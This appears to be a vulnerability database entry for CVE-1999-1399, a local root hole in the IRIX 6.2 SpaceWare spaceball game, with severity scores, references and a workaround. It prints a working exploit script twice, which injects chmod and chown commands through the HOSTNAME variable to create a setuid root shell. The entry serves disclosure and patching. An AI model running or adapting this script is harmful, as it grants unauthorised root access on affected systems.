CVE-1999-1399
CVSS 7.2
Published: 1997-08-20 00:00:00
Last modified: 2016-10-17 22:04:03

[Original] spaceball program in SpaceWare 7.3 v1.0 in IRIX 6.2 allows local users to gain root privileges by setting the HOSTNAME environmental variable to contain the commands to be executed.


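[CNNVD] IRIX SpaceWare spaceball Permissions and Access Control Vulnerability (CNNVD-199708-010)

        The spaceball program in SpaceWare 7.3 v1.0 on IRIX 6.2 contains a vulnerability. A local user can gain root privileges by setting the HOSTNAME environment variable, thereby controlling the commands that will be executed.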

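- CVSS (Base Score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [Total information disclosure, exposing all system files]
Integrity impact: COMPLETE [System integrity can be completely compromised]
Availability impact: COMPLETE [May cause the system to go down completely]
Attack complexity: LOW [No access restrictions for exploitation]
Attack vector: LOCAL [Exploitation requires physical access or a local account]
Authentication: NONE [Exploitation requires no authentication]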

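- CPE (Affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (Technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1399
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1399
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199708-010
(Official data source) CNNVD

- Other links and resources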

http://marc.info/?l=bugtraq&m=87602746719552&w=2
(UNKNOWN)  BUGTRAQ  19970820 SpaceWare 7.3 v1.0
http://www.securityfocus.com/bid/471
(VENDOR_ADVISORY)  BID  471

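- Vulnerability information

IRIX SpaceWare spaceball Permissions and Access Control Vulnerability
High risk    Unknown
1997-08-20 00:00:00 2005-10-20 00:00:00
Local
        The spaceball program in SpaceWare 7.3 v1.0 on IRIX 6.2 contains a vulnerability. A local user can gain root privileges by setting the HOSTNAME environment variable, thereby controlling the commands that will be executed.

- Advisories and patches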

        Removal of this game is recommended. Alternatively, one can edit the spaceball.sh script to set the HOSTNAME using /usr/bsd/hostname.
        Patches for this and other vulnerabilities are available from SGI at
        http://support.sgi.com

- Vulnerability information (19357)

SGI IRIX 6.2 SpaceWare Vulnerability (EDBID:19357)
irix dos
1996-10-30 Verified
0 J.A. Guitierrez
N/A [Click to download]
source: http://www.securityfocus.com/bid/471/info

The SpaceBall game, shipped with Irix 6.2 from Silicon Graphics, contains a security hole which could result in the compromise of the root account. By blindly taking the contents of the $HOSTNAME variable, and not placing quotes around it, the spaceball.sh program can be made to execute commands.

#!/bin/sh
SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh
echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" $SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" $SWDIR/spaceball > /dev/null 2>&1
/tmp/sh

		

- Vulnerability information

6333
spaceware spaceball HOSTNAME Variable Arbitrary Privileged Command Execution
Local Access Required Input Manipulation
Loss of Integrity Workaround
Exploit Public Uncoordinated Disclosure

- Vulnerability description

- Timeline

1997-08-20 Unknown
1997-08-20 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

IRIX SpaceWare Vulnerability
Unknown 471
No No
1996-10-30 12:00:00 2009-07-11 12:56:00
This vulnerability was found by J.A. Guitierrez <spd@GTC1.CPS.UNIZAR.ES>, and reported to the Bugtraq mailing list on August 20, 1997.

- Affected program versions

SGI IRIX 6.2

- Vulnerability discussion

The SpaceBall game, shipped with Irix 6.2 from Silicon Graphics, contains a security hole which could result in the compromise of the root account. By blindly taking the contents of the $HOSTNAME variable, and not placing quotes around it, the spaceball.sh program can be made to execute commands.

- Exploit

#!/bin/sh
SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh
echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" $SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" $SWDIR/spaceball > /dev/null 2>&1
/tmp/sh

- Solution

Removal of this game is recommended. Alternatively, one can edit the spaceball.sh script to set the HOSTNAME using /usr/bsd/hostname.

Patches for this and other vulnerabilities are available from SGI at http://support.sgi.com

- Related references
